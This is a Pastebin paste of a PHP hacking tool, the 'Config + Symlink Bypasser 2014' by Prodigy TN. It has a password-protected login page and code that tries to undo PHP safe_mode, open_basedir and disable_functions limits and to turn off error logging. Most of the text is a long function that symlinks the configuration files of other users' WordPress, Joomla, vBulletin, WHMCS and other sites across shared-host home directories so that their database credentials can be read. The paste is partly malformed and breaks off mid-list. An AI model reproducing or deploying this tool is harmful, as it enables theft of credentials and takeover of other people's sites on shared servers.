Advertisement
Guest User

Untitled

a guest
Oct 5th, 2017
486
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.61 KB | None | 0 0
  1. ?><?
  2.  
  3. //Change User & Password
  4.  
  5. $tacfgd['uname'] = 'prodigy-tn';
  6. $tacfgd['pword'] = 'prodigy-tn';
  7.  
  8.  
  9. // Title of page.
  10. $tacfgd['title'] = 'By Prodigy TN';
  11.  
  12. // Text to appear just above login form.
  13. $tacfgd['helptext'] = 'Login to Script';
  14.  
  15.  
  16. // Set to true to enable the optional remember-me feature, which stores encrypted login details to
  17. // allow users to be logged-in automatically on their return. Turn off for a little extra security.
  18. $tacfgd['allowrm'] = true;
  19.  
  20. // If you have multiple protected pages, and there's more than one username / password combination,
  21. // you need to group each combination under a distinct rmgroup so that the remember-me feature
  22. // knows which login details to use.
  23. $tacfgd['rmgroup'] = 'default';
  24.  
  25. // Set to true if you use your own sessions within your protected page, to stop txtAuth interfering.
  26. // In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not
  27. // destroy the session, so that is left up to you.
  28. $tacfgd['ownsessions'] = false;
  29.  
  30.  
  31.  
  32.  
  33. foreach ($tacfgd as $key => $val) {
  34. if (!isset($tacfg[$key])) $tacfg[$key] = $val;
  35. }
  36.  
  37. if (!$tacfg['ownsessions']) {
  38. session_name('txtauth');
  39. session_start();
  40. }
  41.  
  42. // Logout attempt made. Deletes any remember-me cookie as well
  43. if (isset($_GET['logout']) || isset($_POST['logout'])) {
  44. setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
  45. if (!$tacfg['ownsessions']) {
  46. $_SESSION = array();
  47. session_destroy();
  48. }
  49. else $_SESSION['txtauthin'] = false;
  50. }
  51. // Login attempt made
  52. elseif (isset($_POST['login'])) {
  53. if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
  54. $_SESSION['txtauthin'] = true;
  55. if ($_POST['rm']) {
  56. // Set remember-me cookie for 2 weeks
  57. setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
  58. }
  59. }
  60. else $err = 'Login Faild !';
  61. }
  62. // Remember-me cookie exists
  63. elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
  64. if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
  65. $_SESSION['txtauthin'] = true;
  66. }
  67. else $err = 'Login Faild !';
  68. }
  69. if (!$_SESSION['txtauthin']) {
  70. @ini_restore("safe_mode");
  71. @ini_restore("open_basedir");
  72. @ini_restore("safe_mode_include_dir");
  73. @ini_restore("safe_mode_exec_dir");
  74. @ini_restore("disable_functions");
  75. @ini_restore("allow_url_fopen");
  76.  
  77. @ini_set('error_log',NULL);
  78. @ini_set('log_errors',0);
  79. ?>
  80. <html dir=rtl>
  81. <head>
  82. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  83. <title>Bypasser config/symlink 2014 by Prodigy TN</title>
  84.  
  85. <STYLE>
  86.  
  87. BODY
  88. {
  89. SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
  90. }
  91.  
  92. tr {
  93. BORDER-RIGHT: #dadada ;
  94. BORDER-TOP: #dadada ;
  95. BORDER-LEFT: #dadada ;
  96. BORDER-BOTTOM: #dadada ;
  97. color: #ffffff;
  98. }
  99. td {
  100. BORDER-RIGHT: #dadada ;
  101. BORDER-TOP: #dadada ;
  102. BORDER-LEFT: #dadada ;
  103. BORDER-BOTTOM: #dadada ;
  104. color: #dadada;
  105. }
  106. .table1 {
  107. BORDER: 1;
  108. BACKGROUND-COLOR: #000000;
  109. color: #333333;
  110. }
  111. .td1 {
  112. BORDER: 1;
  113. font: 7pt tahoma;
  114. color: #ffffff;
  115. }
  116. .tr1 {
  117. BORDER: 1;
  118. color: #dadada;
  119. }
  120. table {
  121. BORDER: #eeeeee outset;
  122. BACKGROUND-COLOR: #000000;
  123. color: #dadada;
  124. }
  125. input {
  126. BORDER-RIGHT: #00FF00 1 solid;
  127. BORDER-TOP: #00FF00 1 solid;
  128. BORDER-LEFT: #00FF00 1 solid;
  129. BORDER-BOTTOM: #00FF00 1 solid;
  130. BACKGROUND-COLOR: #333333;
  131. font: 9pt tahoma;
  132. color: #ffffff;
  133. }
  134. select {
  135. BORDER-RIGHT: #ffffff 1 solid;
  136. BORDER-TOP: #999999 1 solid;
  137. BORDER-LEFT: #999999 1 solid;
  138. BORDER-BOTTOM: #ffffff 1 solid;
  139. BACKGROUND-COLOR: #000000;
  140. font: 9pt tahoma;
  141. color: #dadada;;
  142. }
  143. submit {
  144. BORDER: buttonhighlight 1 outset;
  145. BACKGROUND-COLOR: #272727;
  146. width: 40%;
  147. color: #dadada;
  148. }
  149. textarea {
  150. BORDER-RIGHT: #ffffff 1 solid;
  151. BORDER-TOP: #999999 1 solid;
  152. BORDER-LEFT: #999999 1 solid;
  153. BORDER-BOTTOM: #ffffff 1 solid;
  154. BACKGROUND-COLOR: #333333;
  155. font: Fixedsys bold;
  156. color: #ffffff;
  157. }
  158. BODY {
  159. margin: 1;
  160. color: #dadada;
  161. background-color: #000000;
  162. }
  163. A:link {COLOR:red; TEXT-DECORATION: none}
  164. A:visited { COLOR:red; TEXT-DECORATION: none}
  165. A:active {COLOR:red; TEXT-DECORATION: none}
  166. A:hover {color:blue;TEXT-DECORATION: none}
  167.  
  168. </STYLE>
  169. <script language=\'javascript\'>
  170. function hide_div(id)
  171. {
  172. document.getElementById(id).style.display = \'none\';
  173. document.cookie=id+\'=0;\';
  174. }
  175. function show_div(id)
  176. {
  177. document.getElementById(id).style.display = \'block\';
  178. document.cookie=id+\'=1;\';
  179. }
  180. function change_divst(id)
  181. {
  182. if (document.getElementById(id).style.display == \'none\')
  183. show_div(id);
  184. else
  185. hide_div(id);
  186. }
  187. </script>';
  188.  
  189. <body>
  190. <br><br><div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div>
  191. <hr width="300" size="1" noshade color="#cdcdcd">
  192. <p>
  193. <div align="center" class="grey">
  194. <?=$tacfg['helptext']?>
  195. </div>
  196. <p>
  197. <?
  198. if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
  199. else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
  200. if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
  201. ?>
  202. <form name="txtauth" action="<?=$action?>" method="post">
  203. <div align="center">
  204. <table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
  205. <?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
  206. <?if (isset($tacfg['uname'])) {?>
  207. <tr><td>Username:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  208. <?}?>
  209. <tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
  210. <?if ($tacfg['allowrm']) {?>
  211. <tr><td align="left"><input type="submit" name="login" value="Login">
  212. </td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm">
  213. Remember Me ?</label></td></tr>
  214. <?} else {?>
  215. <tr><td colspan="2" align="center">
  216. <input type="submit" name="login" value="Login"></td></tr>
  217. <?}?>
  218. </table>
  219. </div>
  220. </form>
  221.  
  222. <br><br>
  223. <hr width="300" size="1" noshade color="#cdcdcd">
  224. <div class="smalltxt" align="center">Maded By Prodigy_TN
  225. <p>prodigy_tn@hotmail.com</div>
  226.  
  227. <p>&nbsp;</p>
  228.  
  229. </body>
  230. </html>
  231. <?
  232. // Don't delete this!
  233. exit();
  234. }
  235. ?>
  236. <title>Bypasser config/symlink 2014 by Prodigy TN/title>
  237.  
  238. <style type="text/css">
  239. body{
  240. margin : auto;
  241. background-color:#f6f6f6;
  242. color: #444444;
  243. font-family: tahoma, geneva, lucida,lucida grande, arial, helvetica, sans-serif;
  244. font-family: 14px;
  245. text-align: center;
  246. font-weight: bold ;
  247. }
  248.  
  249. input,textarea,select{
  250. font-weight: bold;
  251. color: #000000;
  252. border: 1px solid #CCCCCC;
  253. background-color: white;
  254. padding: 3px;
  255. border-radius: 7px;
  256. }
  257.  
  258. input:focus{
  259.  
  260. box-shadow: 0px 0px 5px #cc0000;
  261.  
  262. }
  263. #footer {
  264.  
  265. color: #000000;
  266. font-family: 14px;
  267. text-shadow: 0px 0px 1px #000000;
  268. font-weight: normal;
  269. }
  270. a{
  271. text-decoration: none;
  272. c
  273. <html>
  274. <style type="text/css">
  275. a{
  276. color: #ffffff;
  277. text-shadow: 0px 0px 3px #999999;
  278. }
  279. </style>
  280. <head>
  281. <meta charset="utf-8">
  282. <title>All In One By ICA</title>
  283. <style>
  284. body{
  285. background-color: #000000;
  286. }
  287. </style>
  288. </head>
  289.  
  290. <body>
  291. </body>
  292. </html>
  293. <center> <a href="http://www.gulfup.com/" target="_blank" title="&#1605;&#1585;&#1603;&#1586; &#1578;&#1581;&#1605;&#1610;&#1604; &#1575;&#1604;&#1589;&#1608;&#1585;">
  294. <img src="http://im64.gulfup.com/I28GmN.png" border="0" alt="&#1605;&#1585;&#1603;&#1586; &#1578;&#1581;&#1605;&#1610;&#1604; &#1575;&#1604;&#1589;&#1608;&#1585;" width="397" height="248" /></a></a>
  295. &nbsp;</style><div id="result">
  296. <br />
  297. <H1 style="color: #444444; text-shadow: 0px 0px 1px #444444";text-align: center;>
  298. Config + Symlink Bypasser 2014 </H1>
  299. </div>
  300. <p dir='ltr' align='center'><font face='Verdana' size='2'>Coded By :
  301. <font color="#CC0000">Prodigy TN</font> <font> FB: <font color='#cc0000'>
  302. www.facebook.com/prodigytn3</font></font></font><font color='#cc0000' face="Verdana" size="2"><center>
  303. <table align='center' width='70%'><td>
  304. <a href="?OPT=1">User + Domain + Sym</td></a><td><a href="?OPT=2">User + Sym</a></td></h3><td>
  305. <a href="?OPT=3">Config ( Perl )</td></a><td>
  306. <a href="?OPT=4">Config ( PHP )</td></a></table></center>
  307.  
  308. <?php
  309.  
  310. error_reporting(0);
  311. ob_start();
  312. function syml($usern,$pdomain)
  313. {
  314. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  315. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  316. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  317. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  318. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  319. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  320. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  321. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  322. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  323. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  324. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  325. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  326. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  327. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  328. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  329. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  330. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  331. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  332. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  333. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  334. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  335. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  336. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  337. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  338. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  339. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  340. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  341. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  342. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  343. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  344. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  345. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  346. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  347. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  348. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  349. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  350. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  351. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  352. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  353. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  354. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  355. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  356. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  357. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  358. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  359. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  360. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  361. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  362. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  363. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  364. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  365. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  366. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  367. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  368. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  369. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  370. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  371. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  372. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  373. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  374. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  375. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  376. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  377. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  378. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  379. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  380. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  381. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  382. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  383. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  384. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  385. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  386. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  387. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  388. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  389. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  390. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  391. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  392. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  393. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  394. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  395. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  396. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  397. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  398. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  399. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  400. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  401. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  402. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  403. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  404. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  405. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  406. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  407. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  408. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  409. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  410. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  411. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  412. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  413. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  414. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  415. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  416. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  417. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  418. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  419. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  420. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  421. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  422. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  423. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  424. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  425. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  426. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  427. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  428. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  429. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  430. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  431. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  432. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  433. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  434. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  435. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  436. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  437. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  438. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  439. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  440. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  441. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  442. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  443. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  444. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  445. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  446. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  447. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  448. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  449. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  450. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  451. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  452. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  453. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  454. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  455. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  456. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  457. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  458. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  459. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  460. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  461. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  462. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  463. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  464. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  465. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  466. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  467. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  468. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  469. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  470. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  471. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  472. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  473. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  474. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  475. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  476. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  477. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  478. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  479. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  480. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  481. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  482. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  483. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  484. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  485. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  486. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  487. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  488. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  489. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  490. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  491. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  492. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  493. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  494. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  495. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  496. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  497. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  498. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  499. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  500. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  501. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  502. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  503. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  504. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  505. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  506. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  507. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  508. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  509. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  510. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
